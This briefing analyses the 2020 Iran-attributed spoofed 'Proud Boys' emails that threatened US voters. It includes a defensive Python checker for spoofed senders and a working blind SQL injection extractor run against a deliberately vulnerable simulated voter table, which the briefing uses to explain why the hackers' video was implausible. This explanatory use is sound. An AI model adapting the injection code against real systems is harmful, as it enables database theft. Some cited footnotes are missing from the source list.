
Intelligence Briefing: Election Interference - Spoofed Email Campaign

CICYBER Team: Dayna McNeil, Federico Bertola, Haley Bounds, Hubert Zhang, Kaitlynn Belmont, Maaz Qureshi

Date: November 1, 2020



Executive Summary: On 21 October 2020, Director of National Intelligence (DNI) John Ratcliffe stated that Iran and Russia had obtained American voter registration data in the weeks leading up to the United States (U.S.) presidential election.[1] The Federal Bureau of Investigation (FBI) received reports of hundreds of emails, purportedly sent from a Proud Boys server, threatening violence against recipients who do not vote for President Donald Trump. U.S. intelligence officials believe Iran was responsible for the emails. The Proud Boys deny involvement; the website at the domain shown as the emails' sender had been kicked off its hosting provider a few days earlier.[2] Iran denied responsibility in an official statement on Twitter.[3] Vladimir Putin's press secretary has denied the charge of Russian election interference.[4]


Overview: According to the DNI, Iran and Russia obtained voter registration information and conducted cyber espionage operations against the U.S. Russian intelligence reportedly obtained state, local, tribal, and territorial (SLTT) government documents and aviation network documents detailing network configurations and credentials, cybersecurity practices, and other sensitive information.[5] Iranian state-sponsored hackers reportedly ran a fabricated email campaign targeting U.S. voters. The DNI stated that the Iranian hackers, masquerading as the Proud Boys, sent emails to voters in Florida, Alaska, Pennsylvania, and Arizona threatening them with violence if they did not vote for Donald Trump in the 3 November 2020 election. Floridians received hundreds of the emails, 183 of them at addresses associated with the University of Florida.[6]


Analysis: The spoofed emails did not originate from the displayed sender address, info@officialproudboys.com. The displayed address is free text in the From header; the messages were actually handed off by servers located in Estonia and Saudi Arabia.[7] Some contained spelling errors.[8] The emails resemble sextortion phishing emails in that they threaten recipients with consequences, in this case violence, if they do not meet the attackers' demands. They also carried a video attachment purporting to show the hackers stealing voter registration data from an official voter database.
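A receiving mail server can detect the mismatch described above from the headers it records itself: the envelope sender (Return-Path), the topmost Received line (the hop that handed the message to the recipient's MX), and the Authentication-Results line with the SPF/DKIM/DMARC outcome. The following Python script is an added example, not code from the briefing or from any party it describes; the two messages, hostnames, IP addresses and authentication results in it are constructed for illustration and are not from the real campaign.

```python
"""Spoofed-sender header check (added example; all messages constructed)."""
import email
import re
from email import policy
from email.utils import parseaddr

# CONSTRUCTED sample: hostnames, IPs and results are invented, not from the campaign.
SPOOFED_RAW = """\
Return-Path: <bounce@example-relay.invalid>
Received: from mail.example-relay.invalid (mail.example-relay.invalid [203.0.113.10])
    by mx.recipient.invalid with ESMTP id abc123
    for <voter@recipient.invalid>; Tue, 20 Oct 2020 18:02:11 +0000
Authentication-Results: mx.recipient.invalid;
    spf=fail smtp.mailfrom=example-relay.invalid;
    dkim=none;
    dmarc=fail header.from=officialproudboys.com
From: "Proud Boys" <info@officialproudboys.com>
To: voter@recipient.invalid
Subject: Vote for Trump or else!

(body omitted)
"""

# CONSTRUCTED sample of a message whose displayed sender is aligned with its infrastructure.
LEGIT_RAW = """\
Return-Path: <news@example.org>
Received: from out.example.org (out.example.org [198.51.100.7])
    by mx.recipient.invalid with ESMTP id def456
    for <voter@recipient.invalid>; Tue, 20 Oct 2020 19:00:00 +0000
Authentication-Results: mx.recipient.invalid;
    spf=pass smtp.mailfrom=example.org;
    dkim=pass header.d=example.org;
    dmarc=pass header.from=example.org
From: Example News <news@example.org>
To: voter@recipient.invalid
Subject: Polling place reminder

(body omitted)
"""

# "from <helo-name> (<rdns> [<ip>])" as most MTAs write it; the rDNS part is optional.
RECEIVED_FROM = re.compile(r"from\s+(\S+)\s+\((?:\S+\s+)?\[([^\]]+)\]")
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)")


def _flat(value) -> str:
    """Unfold a header value and collapse its whitespace."""
    return " ".join(str(value).split())


def _domain(addr: str) -> str:
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def analyse(raw: str) -> dict:
    """Return what the receiving MX can say about the displayed sender."""
    msg = email.message_from_string(raw, policy=policy.default)
    header_domain = _domain(_flat(msg.get("From", "")))
    envelope_domain = _domain(_flat(msg.get("Return-Path", "")))

    # Received lines are prepended hop by hop, so index 0 is the entry written
    # by our own MX; everything below it was written by the sender and can be forged.
    received = [_flat(h) for h in msg.get_all("Received", [])]
    hop = RECEIVED_FROM.search(received[0]) if received else None
    last_hop = {"helo": hop.group(1), "ip": hop.group(2)} if hop else {}

    auth = dict(AUTH_RESULT.findall(_flat(msg.get("Authentication-Results", ""))))

    reasons = []
    if envelope_domain != header_domain:
        reasons.append(f"envelope sender {envelope_domain!r} != From domain {header_domain!r}")
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech) != "pass":
            reasons.append(f"{mech}={auth.get(mech, 'missing')}")

    # The From address is free text; only DMARC alignment ties it to the
    # infrastructure that actually sent the message. Without an
    # Authentication-Results line, fall back to envelope/From agreement.
    if "dmarc" in auth:
        spoofed = auth["dmarc"] != "pass"
    else:
        spoofed = envelope_domain != header_domain

    return {
        "header_from_domain": header_domain,
        "envelope_from_domain": envelope_domain,
        "last_hop": last_hop,
        "auth": auth,
        "spoofed": spoofed,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_RAW), ("legitimate", LEGIT_RAW)):
        print(label, analyse(raw))
```

The check deliberately reads only the topmost Received line: a sender can prepend as many fake Received lines as it likes, but it cannot write the one the recipient's own MX adds. Note also that an envelope/From domain mismatch alone is weak evidence, since bulk mailers routinely send on behalf of other domains; the DMARC verdict is what ties the displayed address to the sending infrastructure.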


The video shows the threat actor exfiltrating data from a database they claim is an official voter registration database. However, the targeted server's IP address is briefly visible on screen and indicates that the server is based in Moldova.[9] This oversight led U.S. intelligence officials to conclude that Iranian hackers were responsible for the email campaign.[10] Reuters reports that anonymous sources have claimed the Moldova-based database server was hosted by Worldstream, a Dutch internet service provider.[11] The sources, reportedly cybersecurity researchers, say they have seen Iranian hackers use Worldstream infrastructure in previous cyber attacks.[12] Worldstream told Reuters that the account associated with the Moldova-based IP address has been banned and that the Dutch National Cyber Security Center is investigating the incident.[13] The speed of the data exfiltration shown is unusual: the tool used, SQLMap, extracts data one request at a time and typically does not return results so quickly.[14] It is likely that the actor set up the Moldova-based database themselves, disguised as an official voter database, so that they could film themselves breaking into it quickly.
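To see why the exfiltration speed is suspicious, here is a simulation of the boolean-based blind technique SQLMap falls back on when query results are not reflected in the page: the attacker injects a true/false question about one character of the target value and learns about one bit per request. This is an added example, not code from the briefing or from SQLMap itself; the sqlite in-memory table, its rows, and the VulnerableApp class are constructed stand-ins for a voter database and for a web page that concatenates a request parameter into SQL.

```python
"""Cost of a boolean-based blind SQL injection dump (added example; data constructed)."""
import sqlite3
from typing import List, Tuple

# CONSTRUCTED rows; they stand in for a voter registration table.
SAMPLE_ROWS = [
    ("alice@example.test", "DEM"),
    ("bob@example.test", "REP"),
    ("carol@example.test", "NPA"),
]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE voters (id INTEGER PRIMARY KEY, email TEXT, party TEXT)")
    con.executemany("INSERT INTO voters (email, party) VALUES (?, ?)", SAMPLE_ROWS)
    return con


class VulnerableApp:
    """Hypothetical page whose 'id' parameter is pasted into SQL unquoted
    (deliberately vulnerable). lookup() returns True when the page would
    render a record, which is the only signal a blind injection gets back."""

    def __init__(self, con: sqlite3.Connection):
        self.con = con
        self.requests = 0  # one HTTP request per oracle question

    def lookup(self, user_input: str) -> bool:
        self.requests += 1
        sql = f"SELECT id FROM voters WHERE id = {user_input}"  # injection point
        return self.con.execute(sql).fetchone() is not None


def extract_value(app: VulnerableApp, column: str, row_id: int, max_len: int = 256) -> str:
    """Recover voters.<column> for one row one character at a time, by binary
    search over ASCII code points. Each character costs 7 requests (128 = 2**7);
    the end of the string costs 7 more, because unicode('') is NULL in sqlite
    and every comparison against NULL is false."""
    chars = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                f"{row_id} AND (SELECT unicode(substr({column}, {pos}, 1)) "
                f"FROM voters WHERE id = {row_id}) > {mid}"
            )
            if app.lookup(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # no character at this position: end of string
            break
        chars.append(chr(lo))
    return "".join(chars)


def dump_column(column: str) -> Tuple[List[str], int]:
    """Dump one column for every sample row; return (values, requests_used)."""
    app = VulnerableApp(build_db())
    values = [extract_value(app, column, i) for i in range(1, len(SAMPLE_ROWS) + 1)]
    return values, app.requests


if __name__ == "__main__":
    values, n = dump_column("email")
    print(values, f"{n} requests for {sum(map(len, values))} characters")
```

Run as-is, the three sample addresses (52 characters) cost 385 requests, and that is against an in-process oracle; over a network each request is a round trip, and a time-based variant multiplies that by the delay used per question. SQLMap adds threads and smarter character ordering, but the information per request stays at about one bit, so a table with millions of voter rows is not dumped in the seconds the video shows unless the actor already controls the database.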


After the SQLMap footage, the video shows the hackers browsing supposed Federal Write-In Absentee Ballots (FWABs) for 40 states. Each state is represented by a folder said to contain hundreds of FWABs. The hackers opened none of the purported ballots except those in the Alaska folder. Influencing the election through FWABs would be near impossible given their numerous eligibility requirements, the physical mail-in process, and their rarity of use.[15] The hackers' actions indicate that their goal was to create the perception that official voter registration databases are insecure and easily compromised.[16]


The threat actor most likely assembled the target list for the spoofed email campaign from open-source intelligence and other collection methods rather than from a breach. Voter registration and party affiliation are public records in Florida, Alaska, Pennsylvania, and Arizona. Many recipients' email addresses had likely been exposed in previous data breaches, and the threat actor likely obtained them the same way addresses are collected for phishing and spam. This would explain why the affected states had reported no breaches before voters began receiving the emails on 20 October.[17] This is not the first time a video of hacking methodology has pointed to Iranian involvement. In July 2020, IBM's cybersecurity division discovered several videos, comprising five hours of footage, on an exposed server. They appeared to be training videos showing purported Iranian hackers obtaining victims' credentials and compromising their email and social media accounts.[18] Unlike the July 2020 videos, which appear to have been exposed through the threat actors' oversight, the spoofed Proud Boys hacking video was deliberately attached to the emails. A comparison of the footage from both incidents may provide further insight into an Iranian connection to the spoofed emails.


Although Iran is typically considered a less sophisticated cyber actor than other state adversaries, it is much more willing to take risks with offensive cyber operations.[19] Russia's alleged actions indicate a clandestine collection operation, gathering U.S. SLTT government documents for use in future operations. The fabricated email campaign is a far more overt attack, promoting violence against U.S. voters in the name of an armed domestic group. It demonstrates the threat actor's ability to monitor the landscape of political movements in the U.S. and to exploit them to raise tensions, provoke violence, and destabilize the country.


Impact: Following the spoofed emails threatening Florida, Alaska, Pennsylvania, and Arizona residents with violence unless they voted for Trump, Joe Biggs, a Florida-based Proud Boys organizer, took to the social media site Parler to declare war on Iran.[20] The targeted states report no evidence that their voter databases were breached.[21] Google has reported that 25,000 of the emails were sent to Gmail users.[22]


Internationally, these attacks on election infrastructure may damage the image of U.S. stability, security, and global influence. Domestically, they aim to sow confusion and distrust in American democracy, dividing the American people and reducing their trust in government institutions. They may create the perception of massive vulnerabilities in the U.S. election system, undermining the credibility of electoral results. That in turn raises the possibility of riots and clashes in defiance of election results, fueling chaos in the streets and eroding institutional credibility.



[1] DNI John Ratcliffe's Remarks at Press Conference on Election Security, Office of the DNI, October 2020, https://www.dni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security

[2] Proud Boys websites kicked off web host, Google Cloud, ZDNet, October 2020, https://www.zdnet.com/article/proud-boys-websites-kicked-off-google-cloud/

[3] Statement from spokesman of Iranian Mission to the United Nations, October 21, 2020, https://twitter.com/miryousefi/status/1319098206861594624

[5] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets, FBI & CISA, October 2020, https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf

[7] Analysis of Wednesday’s foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement

[8] Emails threatening Democratic voters circulate in Collier, Lee counties, News-press, October 2020, https://www.news-press.com/story/news/2020/10/21/emails-threatening-democratic-voters-circulate-collier-lee-counties/6005267002/

[9] Analysis of Wednesday’s foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement

[10] Ibid.

[12] Analysis of Wednesday's foreign election interference announcement, Election Integrity Partnership, October 2020, https://www.eipartnership.net/rapid-response/foreign-election-interference-announcement

[13] Ibid.

[14] Ibid.

[15] Ibid.

[16] Ibid.

[17] 3 states targeted in Iranian email scheme report no evidence of breaches, CBS News, October 2020, https://www.cbsnews.com/news/iran-emails-florida-alaska-arizona-no-evidence-breaches/

[18] Iranian cyberspies leave training videos exposed online, ZDNet, July 2020, https://www.zdnet.com/article/iranian-cyberspies-leave-training-videos-exposed-online/

[19] The Cyber Threat from Iran after the Death of Soleimani, CTC Sentinel, February 2020, https://ctc.usma.edu/cyber-threat-iran-death-soleimani/

[20] Proud Boys Declare 'This Means War' Following Iran Voter Intimidation Threats, Newsweek, October 2020, https://www.newsweek.com/proud-boys-email-iran-war-vote-intimidation-1541252

[21] 3 states targeted in Iranian email scheme report no evidence of breaches, CBS News, October 2020, https://www.cbsnews.com/news/iran-emails-florida-alaska-arizona-no-evidence-breaches/

[22] Google said an Iran-linked disinformation campaign targeted 25,000 Gmail users, after US intelligence said Iran was trying to 'influence public opinion' ahead of Election Day, Business Insider, October 2020, https://www.businessinsider.com/google-voter-intimidation-emails-iran-proud-boys-john-ratcliffe-election-2020-10
